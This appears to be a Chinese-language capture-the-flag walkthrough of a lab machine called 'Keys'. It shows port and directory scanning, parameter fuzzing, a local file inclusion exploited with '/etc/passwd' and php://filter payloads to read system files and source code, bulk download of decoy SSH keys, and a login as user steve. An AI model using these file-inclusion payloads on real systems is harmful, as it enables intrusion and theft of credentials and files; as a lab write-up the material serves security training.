Keys
┌──(kali💀kali)-[~/temp/key]
└─$ sudo arp-scan -l -I eth1
[sudo] password for kali:
Interface: eth1, type: EN10MB, MAC: 08:00:27:fb:51:ff, IPv4: 192.168.8.18
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.8.2 34:2e:b7:08:3d:a1 Intel Corporate
192.168.8.1 a2:cd:db:84:39:2a (Unknown: locally administered)
192.168.8.19 08:00:27:fd:8d:bc PCS Systemtechnik GmbH信息搜集
端口扫描
┌──(kali💀kali)-[~/temp/key]
└─$ rustscan -a $IP -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.8.19:22
Open 192.168.8.19:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 6e:b1:d1:09:f5:dc:01:29:ed:9d:4f:8e:a7:7a:a0:a6 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2uAUC+PcCa2ymDfQ/W4KMlgGPOv23aQnuhgpgSt6TuE4cMZ+J4OfGNu6EpmvzpGnMq+wPeFhL+40fZVFV5DhFHPdnTYMIcvYdAbZ5DeBKbz2PHOa9DkG47l8vQtwkeyekNV5t2Uwc74C2kLRPorZs8KmwCMa1AaW2E77wN2dQJzeKu45cLYtvkJQ2CCb0O87/wEtUQV2gWyonVlxhNlKKbR5iw/mhw7v0JeCDh2PCHALNcgB/bKvMaNA5su59FcFBwkXuwfIpmK07HKG6iAekLj1QIY5IrPtTCHebl/9eqHKL5EhzmGwQ3G7a+Z2ySEei6dWBKV0EiXeaL5P0Mark+NYjISqhay1nlmeM9bmkgEWHuPrMrC4EqbzhgLLzL6YQmqvQIISKeYKztfiMC94iK5MCbw8OKAVe1rYbTT3ZdVBlTx3WiU/s23iF1X0C67QcrTkHqh/zX8e8V/CkfRbIz7TGRiTli0mexrdDPWElXaxYjMJgB9nx2CrJKlvQa40=
| 256 35:f4:29:df:64:6a:be:7f:9f:0a:9f:ee:07:e4:19:07 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMhb/5Z8+ZeDVeZEI7VpvxMH6pmkm/aXCkS6g0RI32GFGtQ+wqWoDy/gULTwUEWkXSn/2DxbzBhF9MsXzdRAKCc=
| 256 4e:0f:f7:32:cc:c7:91:57:07:d9:50:0a:38:c9:e5:11 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINVGc7iARhJng0mD1F8+7P9RI0osKlHniZ3HlfOOXCRh
80/tcp open http syn-ack nginx 1.18.0
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0
|_http-title: The World of Keys
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel目录扫描
┌──(kali💀kali)-[~/temp/key]
└─$ gobuster dir -u http://$IP -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,txt,html
/index.html (Status: 200) [Size: 135]
/readme.php (Status: 200) [Size: 398]漏洞发现
踩点
看一下源代码:
<!DOCTYPE html>
<html>
<head>
<title>The World of Keys</title>
<img src="world_of_keys.jpg" alt="keys" height="685">
</body>
</html>发现一个图片,尝试浅浅分析一下:
┌──(kali💀kali)-[~/temp/key]
└─$ binwalk world_of_keys.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
2976 0xBA0 Copyright string: "Copyright International Color Consortium, 2009"
┌──(kali💀kali)-[~/temp/key]
└─$ exiftool world_of_keys.jpg ExifTool Version Number : 12.23
File Name : world_of_keys.jpg
Directory : .
File Size : 45 KiB
File Modification Date/Time : 2021:10:27 15:26:54-04:00
File Access Date/Time : 2024:07:24 15:44:36-04:00
File Inode Change Date/Time : 2024:07:24 15:44:19-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Profile CMM Type :
Profile Version : 2.0.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2009:03:27 21:36:31
Profile File Signature : acsp
Primary Platform : Unknown ()
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator :
Profile ID : 29f83ddeaff255ae7842fae4ca83390d
Profile Description : sRGB IEC61966-2-1 black scaled
Blue Matrix Column : 0.14307 0.06061 0.7141
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Device Model Desc : IEC 61966-2-1 Default RGB Colour Space - sRGB
Green Matrix Column : 0.38515 0.71687 0.09708
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Luminance : 0 80 0
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0%
Measurement Illuminant : D65
Media Black Point : 0.01205 0.0125 0.01031
Red Matrix Column : 0.43607 0.22249 0.01392
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Technology : Cathode Ray Tube Display
Viewing Cond Desc : Reference Viewing Condition in IEC 61966-2-1
Media White Point : 0.9642 1 0.82491
Profile Copyright : Copyright International Color Consortium, 2009
Chromatic Adaptation : 1.04791 0.02293 -0.0502 0.0296 0.99046 -0.01707 -0.00925 0.01506 0.75179
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Current IPTC Digest : 68cf40a2e2bdeb8263afc23ff28174f7
Original Transmission Reference : zJyh4V_ablyJTPkM0pTI
Image Width : 1440
Image Height : 810
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1440x810
Megapixels : 1.2尝试提取了,但是没发现啥有用的。。。。
# exiftool world_of_keys.jpg -b > temp
┌──(kali💀kali)-[~/temp/key]
└─$ cat temp
*R{���Gp���@j���>i��� A l � � �!!H!u!�!�!�"'"U"�"�"�#
(?(q(�(�))8)k)�)�**5*h*�*�++6+i+�+�,,9,n,�,�-'I'z'�'�(
3F33�3�4+4e4�4�55M5�5�5�676r6�6�7$7`7�7�88P8�8�99B99�9�:6:t:�:�;-;k;�;�<'<e<�<�="=a=�=�> >`>�>�?!?a?�?�@#@d@�@�A)AjA�A�B0BrB�B�C:C}C�DDGD�D�EEUE�E�F"FgF�F�G5G{G�HHKH�H�IIcI�I�J7J}J�K
KSK�K�L*LrL�MMJM�M�N%NnN�OOIO�O�P'PqP�QQPQ�Q�R1R|R�SS_S�S�TBT�T�U(UuU�VV\V�V�WDW�W�X/X}X�YYiY�ZZVZ�Z�[E[�[�\5\�\�]']x]�^^l^�__a_�``W`�`�aOa�a�bIb�b�cCc�c�d@d�d�e=e�e�f=f�f�g=g�g�h?h�h�iCi�i�jHj�j�kOk�k�lWl�m`m�nnkn�ooxo�p+p�p�q:q�q�rKr�ss]s�ttpt�u(u�u�v>v�v�wVw�xxnx�y*y�y�zFz�{{c{�|!|�|�}A}�~~b~�#��G���
�k�͂0����W�������G����r�ׇ;����i�Ή3�����d�ʋ0�����c�ʍ1�����f�Ώ6����n�֑?����z��M��� �����_�ɖ4���
�u���L���$�����h�՛B��������d�Ҟ@��������i�ءG���&����v��V�ǥ8��������n��R�ĩ7�������u��\�ЭD���-�������u��`�ֲK�³8���%�������y��h��Y�ѹJ�º;���.���!������
����2��F���[���p������(��@���X���r������4���P���m��������8���W���w����)���K���m��CRT Reference Viewing Condition in IEC 61966-2-10.9642 1 0.82491Copyright International Color Consortium, 20091.04791 0.02293 -0.0502 0.0296 0.99046 -0.01707 -0.00925 0.01506 0.751791 101168cf40a2e2bdeb8263afc23ff28174f7zJyh4V_ablyJTPkM0pTI14408102832 21440 8101.1664敏感目录
# http://192.168.8.19/readme.php
.......
<!-- Here is a Gift for you Ayr43KwSdwpWQw6HFce8SaMmpWH12XsUF -->
.......尝试使用cyberchef解密:
得到路径,尝试继续:
┌──(kali💀kali)-[~/temp/key]
└─$ curl -s http://$IP/my_personal_wordlist.txt | head
the
of
and
to
a
in
that
I
was
he发现是一个字典,保存下来进行fuzz!
fuzz参数
┌──(kali💀kali)-[~/temp/key]
└─$ ffuf -u http://$IP/readme.php?FUZZ=/etc/passwd -w ./my_personal_wordlist.txt --fw 74
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.8.19/readme.php?FUZZ=/etc/passwd
:: Wordlist : FUZZ: /home/kali/temp/key/my_personal_wordlist.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 74
________________________________________________
34sy [Status: 200, Size: 2004, Words: 88, Lines: 55, Duration: 29ms]
:: Progress: [99900/99900] :: Job [1/1] :: 1503 req/sec :: Duration: [0:01:40] :: Errors: 0 ::命令执行
尝试一下:
┌──(kali💀kali)-[~/temp/key]
└─$ curl http://$IP/readme.php?34sy=/etc/passwd
<!DOCTYPE html>
<html>
<head>
<style>
.center {
margin: 0;
position: absolute;
top: 50%;
left: 50%;
font-size: 100px;
-ms-transform: translate(-50%, -50%);
transform: translate(-50%, -50%);
}
</style>
</head>
<body>
<div class="center">
<p>[ Read Me. ]</p>
<!-- Here is a Gift for you Ayr43KwSdwpWQw6HFce8SaMmpWH12XsUF -->
</div>
</body>
</html>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
steve:x:1000:1000:steve,,,:/home/steve:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
jack:x:1001:1001::/home/jack:/bin/bash
rachel:x:1002:1002::/home/rachel:/bin/bash
useless:x:1003:1003::/home/useless:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin尝试读取其他文件:
┌──(kali💀kali)-[~/temp/key]
└─$ curl -s http://$IP/readme.php?34sy=/etc/passwd | grep "/bin/"
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
steve:x:1000:1000:steve,,,:/home/steve:/bin/bash
jack:x:1001:1001::/home/jack:/bin/bash
rachel:x:1002:1002::/home/rachel:/bin/bash
useless:x:1003:1003::/home/useless:/bin/bash尝试读取这几个用户的私钥,但是都失败了,尝试一下读取这个文件:
┌──(kali💀kali)-[~/temp/key]
└─$ curl -s http://$IP/readme.php?34sy=/var/www/html/readme.php发现会循环输出http的内容,尝试别的办法,例如伪协议:
┌──(kali💀kali)-[~/temp/key]
└─$ curl -s http://$IP/readme.php?34sy=php://filter/convert.base64-encode/resource=/etc/passwd
<!DOCTYPE html>
<html>
<head>
<style>
.center {
margin: 0;
position: absolute;
top: 50%;
left: 50%;
font-size: 100px;
-ms-transform: translate(-50%, -50%);
transform: translate(-50%, -50%);
}
</style>
</head>
<body>
<div class="center">
<p>[ Read Me. ]</p>
<!-- Here is a Gift for you Ayr43KwSdwpWQw6HFce8SaMmpWH12XsUF -->
</div>
</body>
</html>
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtdGltZXN5bmM6eDoxMDE6MTAxOnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb24sLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMjoxMDM6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMzoxMDQ6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwNDoxMTA6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgphdmFoaS1hdXRvaXBkOng6MTA1OjExMzpBdmFoaSBhdXRvaXAgZGFlbW9uLCwsOi92YXIvbGliL2F2YWhpLWF1dG9pcGQ6L3Vzci9zYmluL25vbG9naW4Kc3RldmU6eDoxMDAwOjEwMDA6c3RldmUsLCw6L2hvbWUvc3RldmU6L2Jpbi9iYXNoCnN5c3RlbWQtY29yZWR1bXA6eDo5OTk6OTk5OnN5c3RlbWQgQ29yZSBEdW1wZXI6LzovdXNyL3NiaW4vbm9sb2dpbgpqYWNrOng6MTAwMToxMDAxOjovaG9tZS9qYWNrOi9iaW4vYmFzaApyYWNoZWw6eDoxMDAyOjEwMDI6Oi9ob21lL3JhY2hlbDovYmluL2Jhc2gKdXNlbGVzczp4OjEwMDM6MTAwMzo6L2hvbWUvdXNlbGVzczovYmluL2Jhc2gKc3NoZDp4OjEwNjo2NTUzNDo6L3J1bi9zc2hkOi91c3Ivc2Jpbi9ub2xvZ2luCg== 发现可以读,尝试一下获取readme.php文件内容:
┌──(kali💀kali)-[~/temp/key]
└─$ curl -s http://$IP/readme.php?34sy=php://filter/convert.base64-encode/resource=readme.php
........
PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICA8c3R5bGU+CiAgICAuY2VudGVyIHsKICAgIG1hcmdpbjogMDsKICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgIHRvcDogNTAlOwogICAgbGVmdDogNTAlOwogICAgZm9udC1zaXplOiAxMDBweDsKICAgIC1tcy10cmFuc2Zvcm06IHRyYW5zbGF0ZSgtNTAlLCAtNTAlKTsKICAgIHRyYW5zZm9ybTogdHJhbnNsYXRlKC01MCUsIC01MCUpOwogIH0KICA8L3N0eWxlPgo8L2hlYWQ+Cjxib2R5PgogIDxkaXYgY2xhc3M9ImNlbnRlciI+CiAgICA8cD5bIFJlYWQgTWUuIF08L3A+CiAgICA8IS0tIEhlcmUgaXMgYSBHaWZ0IGZvciB5b3UgQXlyNDNLd1Nkd3BXUXc2SEZjZThTYU1tcFdIMTJYc1VGIC0tPgogIDwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4KCgo8P3BocAogICAgaW5jbHVkZSgkX0dFVFsnMzRzeSddKTsKICAgIC8vIFRoZSBXb3JsZCBvZiBLZXlzIGFyZSBIZXJlIHlDUWxTcS8rKFVxLysoVXFWCiAgICAvLyBJIExvdmUgWjg1IChaZXJvTVEpIDopCiAgICAvLyBvbmUgbW9yZSBnaWZ0IGZvciB5b3UgOikgaWRfcnNhLnppcAo/Pgo=解码以后得到:
..........
<?php
include($_GET['34sy']);
// The World of Keys are Here yCQlSq/+(Uq/+(UqV
// I Love Z85 (ZeroMQ) :)
// one more gift for you :) id_rsa.zip
?>看上去像是加密?试一下:
尝试下载一下这个私钥:
┌──(kali💀kali)-[~/temp/key]
└─$ wget http://$IP/k3ysSsSsSsSsS/id_rsa.zip
--2024-07-24 17:05:44-- http://192.168.8.19/k3ysSsSsSsSsS/id_rsa.zip
Connecting to 192.168.8.19:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-07-24 17:05:44 ERROR 404: Not Found.发现失败。。。。换个思路:
┌──(kali💀kali)-[~/temp/key]
└─$ wget http://$IP/k3ysSsSsSsSsS
--2024-07-24 17:07:44-- http://192.168.8.19/k3ysSsSsSsSsS
Connecting to 192.168.8.19:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://192.168.8.19/k3ysSsSsSsSsS/ [following]
--2024-07-24 17:07:44-- http://192.168.8.19/k3ysSsSsSsSsS/
Reusing existing connection to 192.168.8.19:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘k3ysSsSsSsSsS’
k3ysSsSsSsSsS [ <=> ] 1.11M --.-KB/s in 0.04s
2024-07-24 17:07:45 (31.2 MB/s) - ‘k3ysSsSsSsSsS’ saved [1160047]
┌──(kali💀kali)-[~/temp/key]
└─$ ls -la
total 1996
drwxr-xr-x 2 kali kali 4096 Jul 24 17:07 .
drwxr-xr-x 114 kali kali 4096 Jul 18 11:25 ..
-rw-r--r-- 1 kali kali 1160047 Jul 24 17:07 k3ysSsSsSsSsS
-rw-r--r-- 1 kali kali 811203 Oct 27 2021 my_personal_wordlist.txt
-rw-r--r-- 1 kali kali 6869 Jul 24 15:46 temp
-rw-r--r-- 1 kali kali 45666 Oct 27 2021 world_of_keys.jpg
┌──(kali💀kali)-[~/temp/key]
└─$ head k3ysSsSsSsSsS
<html>
<head><title>Index of /k3ysSsSsSsSsS/</title></head>
<body>
<h1>Index of /k3ysSsSsSsSsS/</h1><hr><pre><a href="../">../</a>
<a href="id_rsa-0001">id_rsa-0001</a> 27-Oct-2021 19:48 960
<a href="id_rsa-0002">id_rsa-0002</a> 27-Oct-2021 19:48 960
<a href="id_rsa-0003">id_rsa-0003</a> 27-Oct-2021 19:48 960
<a href="id_rsa-0004">id_rsa-0004</a> 27-Oct-2021 19:48 960
<a href="id_rsa-0005">id_rsa-0005</a> 27-Oct-2021 19:48 960
<a href="id_rsa-0006">id_rsa-0006</a> 27-Oct-2021 19:48 960发现存在后缀,尝试写个脚本进行后缀文件的提取:
for i in {999..10000}; do wget http://$IP/k3ysSsSsSsSsS/id_rsa-$i; done-rw-r--r-- 1 kali kali 960 Oct 27 2021 id_rsa-9992
-rw-r--r-- 1 kali kali 960 Oct 27 2021 id_rsa-9993
-rw-r--r-- 1 kali kali 960 Oct 27 2021 id_rsa-9994
-rw-r--r-- 1 kali kali 960 Oct 27 2021 id_rsa-9995
-rw-r--r-- 1 kali kali 960 Oct 27 2021 id_rsa-9996
-rw-r--r-- 1 kali kali 960 Oct 27 2021 id_rsa-9997
-rw-r--r-- 1 kali kali 960 Oct 27 2021 id_rsa-9998
-rw-r--r-- 1 kali kali 960 Oct 27 2021 id_rsa-9999
-rw-r--r-- 1 kali kali 1160047 Jul 24 17:07 k3ysSsSsSsSsS
-rw-r--r-- 1 kali kali 811203 Oct 27 2021 my_personal_wordlist.txt
-rw-r--r-- 1 kali kali 6869 Jul 24 15:46 temp
-rw-r--r-- 1 kali kali 45666 Oct 27 2021 world_of_keys.jpg
┌──(kali💀kali)-[~/temp/key]
└─$ ls -la | grep -v 960
total 38244
drwxr-xr-x 2 kali kali 258048 Jul 24 17:16 .
drwxr-xr-x 114 kali kali 4096 Jul 18 11:25 ..
-rw-r--r-- 1 kali kali 980 Oct 27 2021 id_rsa-4695
-rw-r--r-- 1 kali kali 1160047 Jul 24 17:07 k3ysSsSsSsSsS
-rw-r--r-- 1 kali kali 811203 Oct 27 2021 my_personal_wordlist.txt
-rw-r--r-- 1 kali kali 6869 Jul 24 15:46 temp
-rw-r--r-- 1 kali kali 45666 Oct 27 2021 world_of_keys.jpg
┌──(kali💀kali)-[~/temp/key]
└─$ cat id_rsa-4695
HaHa you found me :)
here is a little note for you:-
If you get stuck, Remember I'm here just for you
尝试进一步搜集信息:
┌──(kali💀kali)-[~/temp/key]
└─$ stegsnow -C id_rsa-4695
┌──(kali💀kali)-[~/temp/key]
└─$ ls -la | grep -v 960
total 38244
drwxr-xr-x 2 kali kali 258048 Jul 24 17:16 .
drwxr-xr-x 114 kali kali 4096 Jul 18 11:25 ..
-rw-r--r-- 1 kali kali 980 Oct 27 2021 id_rsa-4695
-rw-r--r-- 1 kali kali 1160047 Jul 24 17:07 k3ysSsSsSsSsS
-rw-r--r-- 1 kali kali 811203 Oct 27 2021 my_personal_wordlist.txt
-rw-r--r-- 1 kali kali 6869 Jul 24 15:46 temp
-rw-r--r-- 1 kali kali 45666 Oct 27 2021 world_of_keys.jpg
┌──(kali💀kali)-[~/temp/key]
└─$ curl -s http://$IP/id_rsa.zip
┌──(kali💀kali)-[~/temp/key]
└─$ wget http://$IP/id_rsa.zip
--2024-07-24 17:20:41-- http://192.168.8.19/id_rsa.zip
Connecting to 192.168.8.19:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 69167472 (66M) [application/zip]
Saving to: ‘id_rsa.zip’
id_rsa.zip 100%[=============================================================================================>] 65.96M 69.9MB/s in 0.9s
2024-07-24 17:20:42 (69.9 MB/s) - ‘id_rsa.zip’ saved [69167472/69167472]
┌──(kali💀kali)-[~/temp/key]
└─$ ls -la id_rsa.zip
-rw-r--r-- 1 kali kali 69167472 Oct 29 2021 id_rsa.zip
┌──(kali💀kali)-[~/temp/key]
└─$ mkdir empty
┌──(kali💀kali)-[~/temp/key]
└─$ ls -la | grep -v 960
total 105800
drwxr-xr-x 3 kali kali 258048 Jul 24 17:23 .
drwxr-xr-x 114 kali kali 4096 Jul 18 11:25 ..
drwxr-xr-x 2 kali kali 4096 Jul 24 17:23 empty
-rw-r--r-- 1 kali kali 980 Oct 27 2021 id_rsa-4695
-rw-r--r-- 1 kali kali 69167472 Oct 29 2021 id_rsa.zip
-rw-r--r-- 1 kali kali 1160047 Jul 24 17:07 k3ysSsSsSsSsS
-rw-r--r-- 1 kali kali 811203 Oct 27 2021 my_personal_wordlist.txt
-rw-r--r-- 1 kali kali 6869 Jul 24 15:46 temp
-rw-r--r-- 1 kali kali 45666 Oct 27 2021 world_of_keys.jpg
┌──(kali💀kali)-[~/temp/key]
└─$ vim shouxialiuqing.txt
┌──(kali💀kali)-[~/temp/key]
└─$ cat shouxialiuqing.txt
id_rsa.zip
empty
id_rsa-4695
id_rsa.zip
k3ysSsSsSsSsS
my_personal_wordlist.txt
temp
world_of_keys.jpg
┌──(kali💀kali)-[~/temp/key]
└─$ rsync -av --delete /home/kali/temp/key/empty/ /home/kali/temp/key/ --exclude-from=shouxialiuqing.txt
┌──(kali💀kali)-[~/temp/key]
└─$ ls
empty id_rsa-4695 id_rsa.zip k3ysSsSsSsSsS my_personal_wordlist.txt temp world_of_keys.jpg继续看吧:
┌──(kali💀kali)-[~/temp/key]
└─$ unzip id_rsa.zip
.......
┌──(kali💀kali)-[~/…/key/id_rsa/2048/private]
└─$ ls | grep 4695
2f308b527109ce4f8bf6e1309f46959d-31598
3532d425c2616a6b4695c773a90f0f97-15654
5011c57c3b9f469550ed799c5ae1dcab-29639
56c523c4a68ec1e35d001c0e4a946950-19140
6d06b5d7b1469576df7c0b1a101b0021-10252
75ac43ece8c2d46954d4e49e4508eae8-28697
981792b07bbb28a146951c361b39dbd8-22707
9cd32e46024469513b452956a5194d55-23773
a4695342dfa09db16dbaa7e6189816c2-12545
a473e40621001f61dbf97b310b1caefb-4695
a69371809f8c60e4695be56a790ffe02-29774
a8c6bc8fe93e3e46952e2b221aca3e12-11043
b43cdbc46950ef6bb6c90196b31f4695-16387
b72b00c6cf53f4ed8656b2ad11a54695-6733
c9b2fe64695c22c2fd94a5a1dba79e09-19864
cf4346954685a727bb87689f55f5500e-18671
d34cfdc476e04ede3c469587fd374438-27252
dc740ebf5f4275f3b46950ddce1701e7-27507
eb153e1cf1a12fb93c3f004350b58228-14695
f456b9ed6dbffec7c8feccbaa1cccc41-24695
ff8c4e5cbee194695eb6b533f9b5e790-9118
ffd29f89285c25946958cea0e62a271a-26059尝试对前面的几个bash用户名进行连接:
提权
steve@keys:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for steve:
sudo: a password is required
steve@keys:~$ ls -la
total 32
drwx------ 3 steve steve 4096 Oct 28 2021 .
drwxr-xr-x 6 root root 4096 Oct 28 2021 ..
lrwxrwxrwx 1 root root 9 Oct 28 2021 .bash_history -> /dev/null
-rw-r--r-- 1 steve steve 220 Oct 27 2021 .bash_logout
-rw-r--r-- 1 steve steve 3526 Oct 27 2021 .bashrc
----r----- 1 root steve 547 Oct 28 2021 .important_message.asc
-rw-r--r-- 1 steve steve 807 Oct 27 2021 .profile
drwx------ 2 steve steve 4096 Oct 28 2021 .ssh
-r-------- 1 steve steve 21 Oct 28 2021 u__s__e__r.txt
steve@keys:~$ cat u__s__e__r.txt
***************VDll6
steve@keys:~$ cat .important_message.asc
-----BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0
hQEMA6B1gxpXS1ctAQf+PTWuk5+Mi6VGX3GOTNBe0S9Yci4pAOvOng+ORZLW/Q2m
A3ckvwiPlAWZiu7J2/TXjhRautusiXhYRb/8oX+JsXJ/2VZu8YEJGgWuySewxYm5
r8L0IPlKOaJLLsf6Vl4EtwTgXo7Zms8xNB8PyUwmEkkLvyFGFC/wNIf7sJZ31U/Z
5iRooTYPAfwLXsc/0sQ7VeeQT++t6547QwTiw9fpKFblwzjypJfIioNWCnoLpfA5
6xnBkkYPpr0w1zItzSBw5FHQKM0mYuf1WdAyfJ6zUytcqeSTZMN0qYkkmJfKN580
aD84m0juc4bJJVF+5pDuduc1j5Va73Lxx46P9TNVhMlBTCDy7uOPAtvrqnqLeYHH
1zhi/OqeFoS59ASvjWsfyur+wRAv6uIMuywIxD7usKIsRko6JkNN//ngcbBCudzX
RA4=
=voUx
-----END PGP MESSAGE-----
